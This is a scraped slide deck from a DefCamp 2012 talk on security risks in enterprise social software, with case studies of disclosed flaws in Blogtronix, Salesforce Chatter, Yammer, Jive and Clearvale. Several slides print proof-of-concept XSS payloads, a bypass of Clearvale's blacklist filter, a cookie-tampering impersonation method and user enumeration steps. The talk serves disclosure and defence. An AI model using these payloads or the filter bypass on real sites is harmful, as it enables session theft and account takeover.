Successfully reported this slideshow.

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

1

Share

Loading in …3
×
1 of 33
1 of 33

More Related Content

Related Audiobooks

Free with a 14 day trial from Scribd

See all

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

  1. 1. Social Enterprise Software Rises! …and so are the Risks Marian Ventuneac marian.ventuneac@gmail.com @mventuneac
  2. 2. About myself  Security Architect  International presenter  Member of OWASP and ISACA global organizations  OWASP Ireland Limerick Chapter Leader https://www.owasp.org/index.php/Ireland-Limerick  Security Researcher PhD, MEng http://www.ventuneac.net http://secureappdev.blogspot.com http://dcsl.ul.ie 2 An Introduction to Web Application Security Risks
  3. 3. Agenda  Social Enterprise Software: What, Why, and How?  Social Enterprise Software & Risks  Thoughts on Calculated Risk  Social Enterprise Software & Risks (some case studies)  Final Thoughts 3 An Introduction to Web Application Security Risks
  4. 4. Social Enterprise Software: What?  Social Enterprise/Social Enterprise Networks/Social Enterprise Software  Enterprise solutions providing Facebook-like social networking functionality ‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’ 4 An Introduction to Web Application Security Risks
  5. 5. Social Enterprise Software: Why?  Improve communication an increase work efficiency  internal collaboration  establish teams, communities or informal groups  share knowledge and learn from other people experiences  social networking  external collaboration with partners …  Used by employees and external customers, suppliers, partners 5 An Introduction to Web Application Security Risks
  6. 6. Social Enterprise Software: Deployment models  On-premise solutions  Deployed inside the enterprise network, usually controlled and managed by the client  Public Cloud-based solutions  Software as a Service (SaaS) - Hosted and administered by the vendor  Hybrid deployments  Usually open to allow external collaboration  customers, suppliers, third-party contractors, etc 6 An Introduction to Web Application Security Risks
  7. 7. Social Enterprise Software: Some of the Risks  Potential loss of enterprise data  Understand what type of data needs to be uploaded there  Do you know/control what data is actually being shared?  Exploitation of common application vulnerabilities  Phishing attacks, social engineering  Viruses and malware  Cloud-based solutions – various compliance and security concerns  Do you know where is your data stored? 7 An Introduction to Web Application Security Risks
  8. 8. Common Strategies for Risk Mitigation  Vendor/supplier due diligence  Security policies (generic/dedicated)  Security processes & procedures  Control the data being shared (data classification)  Verify identity of users accessing the data (authentication)  Control user access to data  Approve/Create/Lock user accounts (accounts management)  Remote wipe (for mobile devices – smartphone, tablets, etc) … 8 An Introduction to Web Application Security Risks
  9. 9. Calculated Risks 9 An Introduction to Web Application Security Risks
  10. 10. Calculated Risks (cont)  Business requirement: WE (the company) need social enterprise software X for Y and Z reasons.  IT Security (most likely take on it):  Scenario 1: No, there is to much risk to take!  Scenario 2: Yes - We trust our partners and their choices.  Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…  Scenario 4: Let’s take a closer look at it…  Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously) 10 An Introduction to Web Application Security Risks
  11. 11. Let’s Take a Closer Look  Software defects leading to exploitation of security vulnerabilities  OWASP Top 10 Security Risks  CVE/SANS Top 25 Programming Errors  Vendor size – a plus, but doesn‘t guarantee the chosen solution is vulnerability free  It is safe to assume there is no application 100% secure  If anyone claims such a thing, can they provide reasonable proof? An Introduction to Web Application Security Risks
  12. 12. Let’s Take a Closer Look (cont)  Trust but verify  Reach an agreement to test the chosen solution in a suitable environment (ideally prior of any contracts being signed)  Manual security testing  Automated security testing  Responsible disclosure  Most likely you will not be disappointed  An Introduction to Web Application Security Risks
  13. 13. The Closer Look (cont)  A practical take on assessing security of social enterprise software solutions  Some of the chosen ones An Introduction to Web Application Security Risks
  14. 14. The Closer Look (cont)  Assessment criteria including tests for  Cross-Site Scripting (XSS)  Insecure Direct Object Reference  Security Missconfiguration  Failure to Restrict URL Access  Unvalidated Redirects and Forwards  Logical Flaws … An Introduction to Web Application Security Risks
  15. 15. Blogtronix Enterprise  Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS  CVE-2011-1039 - Multiple XSS Vulnerabilities  Persistent (partially) XSS via Search functionality (auth. user) HTTP request: http://test_site/Home/pages/search/?search= <script>alert(document.cookie)</script> &sub=1&tab=0 HTTP response: … <a href="/Home/pages/search/?search=%3cscript %3ealert(document.cookie)%3b&amp;sub=1 &amp;tab=0"> <script>alert(docume...</a> </span> <span style=“ … An Introduction to Web Application Security Risks
  16. 16. Blogtronix Enterprise (cont)  CVE-2011-1039 - Multiple XSS Vulnerabilities  Reflected XSS in login page via arbitrary parameter HTTP request: https://test_site/pages/login/?a"'> <script>alert(document.cookie)</script> HTTP response: <form method="post" action="/pages/login/? a"'><script>alert(document.cookie)</script>" id="aspnetForm">  Multiple Reflected XSS via existing and arbitrary parameters of existing resources An Introduction to Web Application Security Risks
  17. 17. Blogtronix Enterprise (cont)  Insecure Direct Object Reference (variant)  Valid user A can potentially impersonate another user B  Tamper value of userAccountID_http://test_site/ cookie (ASP.NET GUID) 1. At login time - replace value of userAccountID_ cookie with the one matching user B 2. Do something noticeable (post a message in group X) & log out 3. As authenticated user A, review user recent B’s activity – user B appears as a recent visitor of group X An Introduction to Web Application Security Risks
  18. 18. Blogtronix Enterprise (cont)  Security Missconfiguration  Enumerate valid user IDs  Unauthenticated attacker checks for https://test_site/users/user_id  if user_id exists, redirected to login  if not, display custom error  Enumerate valid groups  Unauthenticated attacker checks for https://test_site/group_id/pages/people/  if group_id exists, redirected to login  if not, display custom error An Introduction to Web Application Security Risks
  19. 19. Blogtronix Enterprise (cont)  Improper Error Handling An Introduction to Web Application Security Risks
  20. 20. Blogtronix Enterprise (cont)  CVE-2011-1040 Unvalidated Redirects https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f  Once the user logs in, he/she gets redirected to the resource previously stated via ReturnUrl parameter  CVE-2011-1041 Failure to restrict access to protected resources  Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.  Attacker knows hashed user ID => user profile picture can be accessed without auth. An Introduction to Web Application Security Risks
  21. 21. Salesforce Chatter SaaS  Multiple persistent XSS vulnerabilities  via user profile first & last name <a href="/005D00000022Ouw" class= "entityLink" title="Adam" onmouseover="alert(1)" Cole"> Adam&quot; onmouseover=&quot;alert(1)& quot; Cole</a>  via group name <a href="/0F9D0000000PPwz" class= "entityLink" title="test_group" onmouseover="alert(3)"">test_group& quot; onmouseover=&quot;alert(3)&quot;</a> An Introduction to Web Application Security Risks
  22. 22. Salesforce Chatter SaaS (cont)  Improper User Input Validation  File Sharing - CR LF symbols accepted into file title (via SaaS solution) POST /mobile/direct/23.0/ 005D0000001yD7B/feed_items.json HTTP/1.1 Host: eu1.salesforce.com … Content-Disposition: form-data; name="title” arv_test52%0a%0d%0a An Introduction to Web Application Security Risks
  23. 23. Salesforce Chatter Desktop  Improper Error Handling leading to Information Disclosure  submitting comments for inexistent posts HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253nORA-06512: at line 1n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}  attempting to ‘like’ and inexistent post HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDLIKE", line 156nORA-06512: at "DOPEY.CFEEDLIKE", line 217nORA-06512: at "DOPEY.CFEEDLIKE", line 118nORA-06512: at line 1n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"} An Introduction to Web Application Security Risks
  24. 24. Yammer  Persistent XSS via group name HTTP POST request: /ventuneac.net/groups HTTP/1.1 Host: www.yammer.com … -----------------------------295562556131627 Content-Disposition: form-data; name="group[name]" a4" onmouseover="alert(4)" -----------------------------295562556131627 HTTP response (home page): GET /ventuneac.net/ HTTP/1.1 Host: www.yammer.com … <a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group"> An Introduction to Web Application Security Risks
  25. 25. Jive  Persistent XSS via group name (create/edit) HTTP POST request: POST /create-group.jspa HTTP/1.1 Host: ventuneac.jiveon.com … -----------------------------215202979014924 Content-Disposition: form-data; name="description" group2"><script>alert(1)</script> -----------------------------215202979014924 HTTP response (load group from Places): GET /groups/group2 HTTP/1.1 Host: ventuneac.jiveon.com … <meta name="description" content="group2"> <script>alert(1)</script>" /> An Introduction to Web Application Security Risks
  26. 26. BroadVision Clearvale SaaS  Multiple persistent XSS vulnerabilities  via user profile first & last name & search page <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession( document.location('http://www.google.co.uk'))"> m&quot; style=&quot;xss:expr/*XS...</a>  via group name & search page <a href="http://vmarian.clearvale.com/pg/groups/ 23/aaaa-stylexssexprxssessiondocumentlocation httpwwwgooglecouk/" title="aaa"> <a style="xss:expr/*XSS*/ession( document.location('http://www.google.co.uk'))"> aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a> An Introduction to Web Application Security Risks
  27. 27. BroadVision Clearvale SaaS (cont)  The broken fix for user profile name XSS issue  Black-list user input validation style followed by = becomes style00 (style=, style =, etc) document.location followed by ( becomes document.location00 alert followed by ( becomes 00 /* becomes /0* for first instance only */ becomes *0/ …  Improper output escaping An Introduction to Web Application Security Risks
  28. 28. BroadVision Clearvale SaaS (cont)  The broken fix for user profile name XSS issue  Bypassing Clearvale XSS filter XSS payload: firstname: m” style lastname: ="/**/;xss:expr/**/ession(alert/**/('aaa')) HTTP response: … <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa')) ">m&quot; style =&quot;/0**0/;xss:...</a> An Introduction to Web Application Security Risks
  29. 29. Knowing What ‘private’ Really Means  Social Enterprise Software usually provides document sharing/publishing functionality  Private (not shared with anyone – default option)  Shared with private (locked) groups/members  Shared with public groups  Shared with everyone (shared via public link)  In certain conditions, the private documents can become… less private  An Introduction to Web Application Security Risks
  30. 30. AntiVirus & anti-malware file scanning BroadVision Clearvale has a built-in AV scanning engine The rest of tested solutions currently lack such capabilities Yammer and Salesforce plan to add AV file scanning No malicious files were used for testing AV capabilities An Introduction to Web Application Security Risks
  31. 31. The Closer Look: Summary Common security vulnerabilities - can be easily exploited User shared information is not properly validated and sanitised  A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc  Where such user controlled data is seen/accessed by other users, their accounts can easily get compromised Exploitation of such vulnerabilities could severely compromise security of enterprise data An Introduction to Web Application Security Risks
  32. 32. Final Thoughts Even if the vendor is a market leader, it doesn’t necessarily mean they get application security right Dare to ask for proofs of application security  Trust but verify Vendor due diligence, social enterprise software related security policies & security procedures, etc Interested on this kind of benchmarks? OWASP Security Baseline Project https://www.owasp.org/index.php/OWASP_Security_Baseline_Project An Introduction to Web Application Security Risks
  33. 33. Thank You marian.ventuneac@gmail.com @mventuneac

×